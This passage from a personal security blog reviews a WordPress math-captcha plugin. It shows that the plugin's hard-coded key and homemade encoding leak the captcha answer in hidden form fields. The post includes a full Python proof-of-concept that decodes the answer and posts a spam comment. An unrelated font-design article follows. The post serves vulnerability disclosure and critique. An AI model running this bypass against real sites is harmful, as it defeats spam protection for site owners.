<span class="x"> else if ( 1 == $rand_number_string || 0 == $cptch_options["cptch_difficulty_number"] )</span>
<span class="x"> $str_math_expretion .= " ". $number_string[$array_math_expretion[1]];</span>
<span class="x"> else</span>
<span class="x"> $str_math_expretion .= " ".$array_math_expretion[1];</span>
<span class="x"> // Add =</span>
<span class="x"> $str_math_expretion .= " = ";</span>
<span class="x"> // Add result of mathematical expression</span>
<span class="x"> if( 2 == $rand_input ) {</span>
<span class="x"> $str_math_expretion .= " ";</span>
<span class="x"> } else if ( 2 == $rand_number_string || 0 == $cptch_options["cptch_difficulty_number"] ) {</span>
<span class="x"> if( $array_math_expretion[2] < 10 )</span>
<span class="x"> $str_math_expretion .= " ". $number_string[$array_math_expretion[2]];</span>
<span class="x"> else if( $array_math_expretion[2] < 20 && $array_math_expretion[2] > 10 )</span>
<span class="x"> $str_math_expretion .= " ". $number_two_string[ $array_math_expretion[2] % 10 ];</span>
<span class="x"> else {</span>
<span class="x"> if ( get_bloginfo( 'language','Display' ) == "nl-NL" ) {</span>
<span class="x"> $str_math_expretion .= " ".( 0 != $array_math_expretion[2] % 10 ? $number_string[ $array_math_expretion[2] % 10 ] . __( "and", 'captcha' ) : '' ) . $number_three_string[ $array_math_expretion[2] / 10 ];</span>
<span class="x"> } else {</span>
<span class="x"> $str_math_expretion .= " " . $number_three_string[ $array_math_expretion[2] / 10 ]." ".( 0 != $array_math_expretion[2] % 10 ? $number_string[ $array_math_expretion[2] % 10 ] : '');</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x"> } else {</span>
<span class="x"> $str_math_expretion .= $array_math_expretion[2];</span>
<span class="x"> }</span>
<span class="x"> // Add hidden field with encoding result</span>
<span class="x"> $content .= '</span>
<span class="x"> ';</span>
<span class="x"> $content .= $str_math_expretion; </span>
<span class="x"> return $content;</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>What can we see at first glance? The author declares several arrays
holding number words in a rather painful way. He then continues to
build the math equation captcha with a variable called
<code>$array_math_expretion</code> (introduced on line 68). I am pretty sure he
means <code>$array_math_expression</code>. But shit happens. I mean the plugin
is only 2.5 years old and at the very early version 3.8.7. Who cares
about spelling anyways?</p>
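<p>To show what I mean by painful: the same number-to-words lookup fits
into a few lines. This is only a Python sketch for comparison (the names
<code>UNITS</code>, <code>TEENS</code>, <code>TENS</code> and
<code>number_to_words</code> are mine), and it ignores the translation
hooks and the Dutch special case that the plugin handles:</p>

```python
UNITS = "zero one two three four five six seven eight nine".split()
TEENS = ("ten eleven twelve thirteen fourteen fifteen "
         "sixteen seventeen eighteen nineteen").split()
TENS = "twenty thirty forty fifty sixty seventy eighty ninety".split()

def number_to_words(n):
    """Spell out an integer between 0 and 99 in English."""
    if not 0 <= n <= 99:
        raise ValueError("only 0..99 can occur in this captcha")
    if n < 10:
        return UNITS[n]
    if n < 20:
        return TEENS[n - 10]
    tens, unit = divmod(n, 10)
    # 'twenty', 'twenty four', ...
    return TENS[tens - 2] + ("" if unit == 0 else " " + UNITS[unit])

print(number_to_words(24))
```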
<p>Lots of hard-to-understand code follows. Some random integers are
obtained to build the fancy <em>expretion</em>. And, wait, what's that on line
80?!</p>
<div class="highlight"><pre><span></span><code><span class="x">// Result must not be equal to the negative number</span>
<span class="x">if($array_math_expretion[0] < $array_math_expretion[1]) {</span>
<span class="x"> $number = $array_math_expretion[0];</span>
<span class="x"> $array_math_expretion[0] = $array_math_expretion[1];</span>
<span class="x"> $array_math_expretion[1] = $number;</span>
<span class="x">}</span>
</code></pre></div>
<p>The author prevents the subtraction from becoming negative in a cumbersome
way. Really?! Is the missing commutative property that hard to work
around?</p>
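<p>For comparison, a less cumbersome way to keep the difference
non-negative is to order the two operands before subtracting. A small
Python sketch (the function name <code>subtraction_operands</code> is made
up for this example, the range 1 to 9 is taken from the plugin code
above):</p>

```python
import random

def subtraction_operands(rng=random):
    """Draw two digits from 1..9 and order them so that a - b >= 0."""
    a, b = rng.randint(1, 9), rng.randint(1, 9)
    a, b = max(a, b), min(a, b)  # larger operand first, no temp variable
    return a, b, a - b

a, b, diff = subtraction_operands()
print("%d − %d = %d" % (a, b, diff))
```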
<p>Well let's go further. I really don't care how exactly the mathematical
expression is built, I just know that it infinitely sucks.</p>
<p>Consider the final lines 135 to 140. There the captcha answer is
<em>encoded</em> and then injected into the form where the user has to enter
the captcha. Injecting encrypted hidden input fields is a
common technique among web developers, but it is only safe if
the hidden field values are properly encrypted. Let's see if the
author did so by having a look at the function encode():</p>
<div class="highlight"><pre><span></span><code><span class="x">// Function for encodinf number</span>
<span class="x">if ( ! function_exists( 'encode' ) ) {</span>
<span class="x"> function encode( $String, $Password, $cptch_time ) {</span>
<span class="x"> // Check if key for encoding is empty</span>
<span class="x"> if ( ! $Password ) die ( __( "Encryption password is not set", 'captcha' ) );</span>
<span class="x"> $Salt = md5( $cptch_time, true );</span>
<span class="x"> $String = substr( pack( "H*", sha1( $String ) ), 0, 1 ).$String;</span>
<span class="x"> $StrLen = strlen( $String );</span>
<span class="x"> $Seq = $Password;</span>
<span class="x"> $Gamma = '';</span>
<span class="x"> while ( strlen( $Gamma ) < $StrLen ) {</span>
<span class="x"> $Seq = pack( "H*", sha1( $Seq . $Gamma . $Salt ) );</span>
<span class="x"> $Gamma.=substr( $Seq, 0, 8 );</span>
<span class="x"> }</span>
<span class="x"> return base64_encode( $String ^ $Gamma );</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>Again, before I dig any deeper into the encoding function, I want
to know how it is called. Maybe the input parameters are predictable. Oh
boy, they are. The encoding function is called on line 136 of the previous
code snippet with two global variables, a timestamp and a
<em>password</em>, as well as the captcha expression string:</p>
<div class="highlight"><pre><span></span><code><span class="x">$str_key //the password</span>
<span class="x">$cptch_time // the timestamp</span>
</code></pre></div>
<p>These variables (the freaking password!) are initialized at the
beginning of the plugin to the following values:</p>
<div class="highlight"><pre><span></span><code><span class="x">// Add global setting for Captcha</span>
<span class="x">global $wpmu, $str_key, $cptch_time;</span>
<span class="x">$str_key = "bws_3110013";</span>
<span class="x">$cptch_time = time();</span>
</code></pre></div>
<p>Well, what does that mean?</p>
<p>Whenever a captcha is generated, the captcha answer is <em>encrypted</em> with
a fully exposed password (<em>bws_3110013</em>) and a known timestamp (the
timestamp is known because it is also sent as a hidden field in the form).
That means we can simply apply the decode() function to the hidden values
whenever we fill out a form, and thus calculate the captcha answer
ourselves from the hidden input parameters! BOOM, captcha solved without
even applying OCR techniques (insofar as parsing these simple equations
counts as OCR).</p>
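<p>To make this concrete, here is a rough Python sketch of my reading of
the plugin's PHP encode() and of its inverse. The helper name
<code>keystream</code>, the sample timestamp and the sample answer are
assumptions for illustration. Only the key is taken from the plugin
source:</p>

```python
import base64
import hashlib

KEY = "bws_3110013"  # hard-coded in the plugin source

def keystream(key, salt, length):
    """Mirror of the PHP while loop: chained SHA-1, 8 bytes per round."""
    seq, gamma = key, b""
    while len(gamma) < length:
        seq = hashlib.sha1(seq + gamma + salt).digest()
        gamma += seq[:8]
    return gamma

def encode(plain, key, cptch_time):
    salt = hashlib.md5(cptch_time.encode()).digest()
    data = plain.encode()
    # One check byte (first byte of SHA-1 of the plaintext) is prepended.
    data = hashlib.sha1(data).digest()[:1] + data
    gamma = keystream(key.encode(), salt, len(data))
    return base64.b64encode(bytes(a ^ b for a, b in zip(data, gamma))).decode()

def decode(token, key, cptch_time):
    salt = hashlib.md5(cptch_time.encode()).digest()
    raw = base64.b64decode(token)
    # The PHP version sizes the keystream by the base64 length; the
    # leading bytes are the same, so the decoded length is enough here.
    gamma = keystream(key.encode(), salt, len(raw))
    data = bytes(a ^ b for a, b in zip(raw, gamma))
    check, plain = data[:1], data[1:]
    if hashlib.sha1(plain).digest()[:1] != check:
        return None
    return plain.decode()

# Hypothetical hidden field values as they would appear in a form:
cptch_time = "1383782400"
cptch_result = encode("7", KEY, cptch_time)
print(decode(cptch_result, KEY, cptch_time))
```

<p>Everything decode() needs is either public (the key) or shipped in the
form itself (the timestamp and the encoded result), so nothing has to be
guessed.</p>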
<p>For completeness' sake, here is the decode() function (I honestly cannot say
whether the encryption itself is any good, because I don't have profound
knowledge of cryptography, but it does look very weak to me. Could you
elaborate on it? Leave me a comment :P):</p>
<div class="highlight"><pre><span></span><code><span class="x">// Function for decoding number</span>
<span class="x">if ( ! function_exists( 'decode' ) ) {</span>
<span class="x"> function decode( $String, $Key, $cptch_time ) {</span>
<span class="x"> // Check if key for encoding is empty</span>
<span class="x"> if ( ! $Key ) die ( __( "Decryption password is not set", 'captcha' ) );</span>
<span class="x"> $Salt = md5( $cptch_time, true );</span>
<span class="x"> $StrLen = strlen( $String );</span>
<span class="x"> $Seq = $Key;</span>
<span class="x"> $Gamma = '';</span>
<span class="x"> while ( strlen( $Gamma ) < $StrLen ) {</span>
<span class="x"> $Seq = pack( "H*", sha1( $Seq . $Gamma . $Salt ) );</span>
<span class="x"> $Gamma.= substr( $Seq, 0, 8 );</span>
<span class="x"> }</span>
<span class="x"> $String = base64_decode( $String );</span>
<span class="x"> $String = $String^$Gamma;</span>
<span class="x"> $DecodedString = substr( $String, 1 );</span>
<span class="x"> $Error = ord( substr( $String, 0, 1 ) ^ substr( pack( "H*", sha1( $DecodedString ) ), 0, 1 ));</span>
<span class="x"> if ( $Error ) </span>
<span class="x"> return false;</span>
<span class="x"> else </span>
<span class="x"> return $DecodedString;</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>Should I prove my allegations above? I will finish my experiments
soon and then post an exploit for this weakness, written in
Python. I will also add this POC to my GitHub account. But for now the
explanation above will suffice.</p>
<p><strong>Edit: As promised, here is the code that reverses the decode
function:</strong></p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">lxml.html</span>
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="kn">import</span> <span class="nn">base64</span>
<span class="c1"># A blog post site that needs to have the plugin http://wordpress.org/plugins/captcha/ enabled and </span>
<span class="c1"># should have an open comment form. This 'attack' works on every form that the plugin supports [e.g. registration,</span>
<span class="c1"># login, ...]. This renders the captcha completely useless.</span>
<span class="c1"># Author: Nikolai Tschacher</span>
<span class="c1"># Date: 07.11.2013</span>
<span class="c1"># tested on my local lamp with version 3.8.7</span>
<span class="n">TARGET</span> <span class="o">=</span> <span class="s2">"http://localhost/~nikolai/wordpress/?p=1"</span> <span class="c1"># The landing site.</span>
<span class="n">COMMENT_POST</span> <span class="o">=</span> <span class="s2">"http://localhost/~nikolai/wordpress/wp-comments-post.php"</span> <span class="c1"># The comment form to send POST requests at.</span>
<span class="n">KEY</span> <span class="o">=</span> <span class="s2">"bws_3110013"</span>
<span class="k">def</span> <span class="nf">no_plugin</span><span class="p">(</span><span class="n">reason</span><span class="o">=</span><span class="s2">""</span><span class="p">):</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'The plugin hidden fields couldn</span><span class="se">\'</span><span class="s1">t be located. Make sure it is installed. Reason: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">reason</span><span class="p">))</span>
<span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
<span class="c1"># This function reverses essentially the encoding of the hidden field cptch_result.</span>
<span class="c1"># It is exactly the same function with the same password as in the plugin source code.</span>
<span class="k">def</span> <span class="nf">reverse</span><span class="p">(</span><span class="n">captcha</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">cptch_time</span><span class="p">):</span>
<span class="c1"># just convert all but the captcha string to ascii</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">key</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s1">'ascii'</span><span class="p">)</span>
<span class="n">cptch_time</span> <span class="o">=</span> <span class="n">cptch_time</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s1">'ascii'</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i] Trying to decode captcha: </span><span class="si">{}</span><span class="s1">, key: </span><span class="si">{}</span><span class="s1"> and cptch_time: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">captcha</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">cptch_time</span><span class="p">))</span>
<span class="n">d</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">()</span>
<span class="n">d</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">cptch_time</span><span class="p">)</span>
<span class="n">salt</span> <span class="o">=</span> <span class="n">d</span><span class="o">.</span><span class="n">digest</span><span class="p">()</span>
<span class="n">slen</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">captcha</span><span class="p">)</span>
<span class="n">seq</span> <span class="o">=</span> <span class="n">key</span>
<span class="n">gamma</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">()</span>
<span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">gamma</span><span class="p">)</span> <span class="o"><</span> <span class="n">slen</span><span class="p">:</span>
<span class="n">sha</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">sha1</span><span class="p">()</span>
<span class="n">L</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">()</span>
<span class="n">L</span><span class="o">.</span><span class="n">extend</span><span class="p">(</span><span class="n">seq</span><span class="p">)</span>
<span class="n">L</span><span class="o">.</span><span class="n">extend</span><span class="p">(</span><span class="n">gamma</span><span class="p">)</span>
<span class="n">L</span><span class="o">.</span><span class="n">extend</span><span class="p">(</span><span class="n">salt</span><span class="p">)</span>
<span class="n">sha</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">L</span><span class="p">)</span>
<span class="n">seq</span> <span class="o">=</span> <span class="n">sha</span><span class="o">.</span><span class="n">digest</span><span class="p">()</span>
<span class="n">gamma</span><span class="o">.</span><span class="n">extend</span><span class="p">(</span><span class="n">seq</span><span class="p">[:</span><span class="mi">8</span><span class="p">])</span>
<span class="n">decoded</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">captcha</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">captcha</span><span class="p">,</span> <span class="s1">'utf-8'</span><span class="p">));</span>
<span class="k">for</span> <span class="n">c</span><span class="p">,</span> <span class="n">cc</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">captcha</span><span class="p">,</span> <span class="n">gamma</span><span class="p">):</span>
<span class="n">decoded</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">c</span> <span class="o">^</span> <span class="n">cc</span><span class="p">))</span>
<span class="k">return</span> <span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">decoded</span><span class="p">[</span><span class="mi">1</span><span class="p">:])</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="c1"># Obtain post parameters from comment form</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">TARGET</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">ConnectionError</span> <span class="k">as</span> <span class="n">cerr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Network problem occurred: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">cerr</span><span class="p">))</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">Timeout</span> <span class="k">as</span> <span class="n">terr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Connection timeout: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">terr</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">r</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'HTTP Error:'</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)</span>
<span class="c1"># Parse parameters and solve captcha</span>
<span class="n">dom</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">fromstring</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s1">'utf-8'</span><span class="p">))</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">el</span> <span class="o">=</span> <span class="n">dom</span><span class="o">.</span><span class="n">find_class</span><span class="p">(</span><span class="s1">'cptch_block'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">ierr</span><span class="p">:</span>
<span class="n">no_plugin</span><span class="p">(</span><span class="s1">'find_class cptch_block'</span><span class="p">)</span> <span class="c1"># No such CSS class found means most likely the plugin is not installed.</span>
<span class="n">captcha</span> <span class="o">=</span> <span class="n">el</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">el</span><span class="o">.</span><span class="n">getchildren</span><span class="p">():</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'cptch_result'</span><span class="p">:</span>
<span class="n">result</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'cptch_time'</span><span class="p">:</span>
<span class="n">time</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">except</span> <span class="ne">KeyError</span><span class="p">:</span>
<span class="k">pass</span>
<span class="n">el</span><span class="o">=</span> <span class="n">dom</span><span class="o">.</span><span class="n">find_class</span><span class="p">(</span><span class="s1">'form-submit'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">el</span><span class="o">.</span><span class="n">getchildren</span><span class="p">():</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'comment_post_ID'</span><span class="p">:</span>
<span class="n">post_id</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'name'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'comment_parent'</span><span class="p">:</span>
<span class="n">comment_parent</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">attrib</span><span class="p">[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="k">except</span> <span class="ne">KeyError</span><span class="p">:</span>
<span class="k">pass</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Captcha is "</span><span class="si">{}</span><span class="s1">"'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">captcha</span><span class="p">))</span>
<span class="c1"># Try to crickiticrack it :P [Well we just use the decode() function]</span>
<span class="n">solution</span> <span class="o">=</span> <span class="n">reverse</span><span class="p">(</span><span class="n">result</span><span class="p">,</span> <span class="n">KEY</span><span class="p">,</span> <span class="n">time</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Found solution: "</span><span class="si">{}</span><span class="s1">"'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">solution</span><span class="p">))</span>
<span class="c1"># Now write a comment with the cracked captcha to prove that we provided the</span>
<span class="c1"># correct solution.</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'author'</span><span class="p">:</span> <span class="s1">'spammer'</span><span class="p">,</span> <span class="s1">'email'</span><span class="p">:</span> <span class="s1">'spammer@spamhouse.org'</span><span class="p">,</span> <span class="s1">'url'</span><span class="p">:</span> <span class="s1">'http://spamming.com'</span><span class="p">,</span>
<span class="s1">'cptch_result'</span><span class="p">:</span> <span class="n">result</span><span class="p">,</span> <span class="s1">'cptch_time'</span><span class="p">:</span> <span class="n">time</span><span class="p">,</span> <span class="s1">'cptch_number'</span><span class="p">:</span> <span class="n">solution</span><span class="p">,</span>
<span class="s1">'comment'</span><span class="p">:</span> <span class="s2">"Hi there! No protection from spammers!!!!:D"</span><span class="p">,</span> <span class="s1">'submit'</span><span class="p">:</span> <span class="s1">'Post+Comment'</span><span class="p">,</span>
<span class="s1">'comment_post_ID'</span><span class="p">:</span> <span class="n">post_id</span><span class="p">,</span> <span class="s1">'comment_parent'</span><span class="p">:</span> <span class="n">comment_parent</span><span class="p">}</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">COMMENT_POST</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">)</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">ConnectionError</span> <span class="k">as</span> <span class="n">cerr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Network problem occurred: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">cerr</span><span class="p">))</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">Timeout</span> <span class="k">as</span> <span class="n">terr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Connection timeout: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">terr</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">r</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'HTTP Error:'</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)</span>
</code></pre></div>
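<p>The core of the weakness can also be reproduced offline, without a WordPress installation. The following is only a minimal sketch: the plugin's encoder is not quoted in this article, so <code>encode_sketch</code> is a hypothetical stand-in that assumes the encoder is the exact inverse of the decode() function shown above. Unlike the POC, the port of decode() here also performs the one-byte checksum test from the PHP code.</p>

```python
import base64
import hashlib

KEY = b"bws_3110013"  # the hard-coded password from the plugin source


def keystream(key: bytes, cptch_time: bytes, length: int) -> bytes:
    """Rebuild the Gamma keystream the same way the PHP decode() does."""
    salt = hashlib.md5(cptch_time).digest()
    seq, gamma = key, b""
    while len(gamma) < length:
        seq = hashlib.sha1(seq + gamma + salt).digest()
        gamma += seq[:8]
    return gamma


def xor(data: bytes, gamma: bytes) -> bytes:
    """XOR two byte strings, truncating to the shorter one (like PHP's ^)."""
    return bytes(a ^ b for a, b in zip(data, gamma))


def encode_sketch(answer: str, key: bytes, cptch_time: str) -> str:
    """Hypothetical encoder: assumed inverse of decode(), NOT plugin code."""
    body = answer.encode("ascii")
    checksum = hashlib.sha1(body).digest()[:1]  # first byte guards the payload
    plain = checksum + body
    gamma = keystream(key, cptch_time.encode("ascii"), len(plain))
    return base64.b64encode(xor(plain, gamma)).decode("ascii")


def decode(token: str, key: bytes, cptch_time: str):
    """Port of the PHP decode(); returns None if the checksum byte is wrong."""
    # Like the PHP code, size the keystream by the base64 string length.
    gamma = keystream(key, cptch_time.encode("ascii"), len(token))
    plain = xor(base64.b64decode(token), gamma)
    body = plain[1:]
    if plain[:1] != hashlib.sha1(body).digest()[:1]:
        return None
    return body.decode("ascii", errors="replace")


if __name__ == "__main__":
    token = encode_sketch("7", KEY, "1383800000")  # made-up timestamp
    print(token, "->", decode(token, KEY, "1383800000"))
```

<p>Since both the key and the timestamp are known to every visitor, the keystream is fully determined by public data, which is why the hidden field gives the answer away.</p>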
<h3>Conclusion</h3>
<p>Let me summarize:</p>
<ul>
<li>The captcha implementation of the plugin is bad because it does not
prevent computers from solving it (the idea of serving
mathematical equations in this form is highly debatable).</li>
<li>The captcha author implements his own encryption function, which is
almost always a very bad idea unless your name is Bruce
Schneier or you are a mathematician.</li>
<li>The captcha plugin stores clear text passwords in the source code,
visible to anyone.</li>
<li>The captcha plugin has a very big user base (over one million
downloads) and an alarmingly high rating.</li>
<li>The <a href="http://bestwebsoft.com/" title="BestWebSoft">authors</a> earn money with
this shitty software and the users are left completely unprotected.</li>
</ul>
<p>Maybe the worst part of all this is that there's also a premium version
of this plugin. And the most frightening observation: most users are
completely unaware of the consequences of using such software (judging
by the high average ratings for this plugin). For instance, I found the
following business comment on the vendor site. This is absolutely
ridiculous.</p>
<p><a href="https://incolumitas.com/uploads/2013/11/Screenshot-from-2013-11-04-072343.png"><img alt="Client from BestWebSoft ordering captcha for several thousand dollars without knowing the
quality." src="https://incolumitas.com/uploads/2013/11/Screenshot-from-2013-11-04-072343-1024x576.png"></a></p>
<p>Anyways, that's it! Send me a letter for Xmas!</p>Create your own font the hard way!2013-10-16T15:06:00+02:002013-10-16T15:06:00+02:00Nikolai Tschachertag:incolumitas.com,2013-10-16:/2013/10/16/create-your-own-font-the-hard-way/<p><em>Last major update on 23.10.2013</em> </p>
<h3>Preface</h3>
<p>As promised in my last article, I will guide you through the
creation process of a rudimentary font. I will use the glyphs of my font
to draw captchas and incorporate the implementation into my brand new
captcha plugin for WordPress. There are already quite a few captcha
plugins out there; some of them are better than mine
(<a href="http://www.google.com/recaptcha">RECAPTCHA</a> for instance helps digitize
books and thus solves two problems at the same time),
<a href="http://wordpress.org/plugins/captcha/">others</a> are worse, because the
math equations can simply be parsed (as far as I can judge without
inspecting the code further).</p>
<p>In this article, however, I will focus entirely on the font
and abstract from its future usage in the captcha.</p>
<h3>Technical background of fonts</h3>
<p>A logical start for font creation is to answer the question of what type of
font we are going to create. But let's first introduce some concepts that
are important when it comes to font design.</p>
<p>In short: a font is a collection of glyphs. Each glyph has a shape and
there are various ways of describing that shape. You can imagine a glyph
as an instantiation of a character. Whereas a character is a concept, a
glyph is a reification of that concept. When we speak of glyphs, we are
interested in the form, design and appearance of the character, not the
character itself as a carrier of information. Now in our Latin font,
there is a one-to-one mapping of glyphs to characters. But in some other
scripts there might be different glyphs for a character depending on
the adjacent characters (for instance, in Arabic some characters have
four or more different glyphs).</p>
<p>Now let's answer the question of which font format we are going to choose.
Essentially, there are three different font types, each with
different advantages and drawbacks. They are:</p>
<ul>
<li>
<h4>Bitmap fonts</h4>
<p>Fonts in this format are described as an array of pixels (a bitmap).
You can imagine the array as a two-dimensional coordinate system;
when rasterizing the font you just copy that array into the coordinate
system of the output canvas. The glyph information is rather
inflexible, because there is no easy and intuitive way to resize
the individual glyphs, and therefore there are usually different bitmaps
for the different sizes and styles such as cursive,
bold or normal.</p>
</li>
<li>
<h4>Outline fonts</h4>
<p>This format takes a different approach. Here we don't store the
actual pixels of the glyphs. Instead we store the information of
how to draw the glyphs as a mathematical function with different
parameters which control the shape (cursive, bold, normal), the size
(12px, 36px, npx) and other aspects of the appearance of each glyph.
An outline is a set of contours or paths, and the paths consist of
Bézier splines and simple lines. The splines are normally quadratic
or cubic Bézier curves. The glyphs are therefore only rasterized once
the application has determined all the parameters. Outline fonts
are very dynamic and powerful, but require a lot more processing
power than bitmap fonts. PostScript and TrueType fonts are
examples of this format.</p>
</li>
<li>
<h4>Stroke fonts</h4>
<p>In stroke fonts, each stem of the glyph is represented by
one line down the center of the stem, and the line is later drawn
with a certain width. I am not particularly
interested in stroke fonts, but in case you are, just read up on them
on the interwebs.</p>
</li>
</ul>
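<p>To make the outline idea a bit more concrete, here is a minimal sketch (not the code of my plugin) of how a single cubic Bézier segment can be scaled and then sampled. The helper names <code>cubic_bezier</code>, <code>scale</code> and <code>sample</code> as well as the control points are made up for illustration. Resizing only touches the four control points; the pixels are computed afterwards:</p>

```python
from typing import List, Tuple

Point = Tuple[float, float]


def cubic_bezier(p0: Point, p1: Point, p2: Point, p3: Point, t: float) -> Point:
    """Evaluate a cubic Bézier curve at parameter t in [0, 1] (Bernstein form)."""
    u = 1.0 - t
    x = u**3 * p0[0] + 3 * u**2 * t * p1[0] + 3 * u * t**2 * p2[0] + t**3 * p3[0]
    y = u**3 * p0[1] + 3 * u**2 * t * p1[1] + 3 * u * t**2 * p2[1] + t**3 * p3[1]
    return (x, y)


def scale(points: List[Point], factor: float) -> List[Point]:
    """Resize an outline by scaling its control points, not its pixels."""
    return [(x * factor, y * factor) for x, y in points]


def sample(points: List[Point], steps: int = 16) -> List[Point]:
    """Sample steps + 1 evenly spaced parameter values along one segment."""
    p0, p1, p2, p3 = points
    return [cubic_bezier(p0, p1, p2, p3, i / steps) for i in range(steps + 1)]


if __name__ == "__main__":
    # Hypothetical arch-shaped segment: start, two control points, end.
    arch = [(0, 0), (0, 10), (10, 10), (10, 0)]
    print(sample(arch, 4))
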